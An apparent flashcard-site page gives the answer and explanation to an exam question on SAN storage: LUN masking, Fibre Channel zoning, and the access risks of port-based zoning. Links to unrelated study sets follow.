Answer: F,G Explanation: A logical unit number (LUN) is a unique identifier that designates individual hard disk devices or grouped devices for address by a protocol associated with a SCSI, iSCSI, Fibre Channel (FC) or similar interface. LUNs are central to the management of block storage arrays shared over a storage area network (SAN). LUN masking subdivides access to a given port. Then, even if several LUNs are accessed through the same port, the server masks can be set to limit each server's access to the appropriate LUNs. LUN masking is typically conducted at the host bus adapter (HBA) or switch level. Port mapping is used in 'Zoning'. In storage networking, Fibre Channel zoning is the partitioning of a Fibre Channel fabric into smaller subsets to restrict interference, add security, and to simplify management. While a SAN makes available several devices and/or ports to a single device, each system connected to the SAN should only be allowed access to a controlled subset of these devices/ports. Zoning can be applied to either the switch port a device is connected to OR the WWN World Wide Name on the host being connected. As port based zoning restricts traffic flow based on the specific switch port a device is connected to, if the device is moved, it will lose access. Furthermore, if a different device is connected to the port in question, it will gain access to any resources the previous host had access to.


Kaugnay na mga set ng pag-aaral

ap gov campaign finance and super pacs

View Set

U.S. History - Ch. 16, Sec. 4 - Questions

View Set

A People's History of the United States by Howard Zinn CH. 7-8 Study Guide

View Set

CEH.v10 Hacking Mobile Platforms and SQL Injection

View Set

2204 Milieu Therapy - The Therapeutic Community, 2204 The Nursing Process in Psychiatric/Mental Health Nursing, 2204 Relationship Development, chapter 6 Cultural and Spiritual Concepts Relevant to Psychiatric/Mental Health Nursing, 2204 Ethical and L...

View Set

Blinn Biology 1406 - Exam 1 - Elsayed

View Set

Fundamentals of Diagnostic Imaging: Week 9 and 10

View Set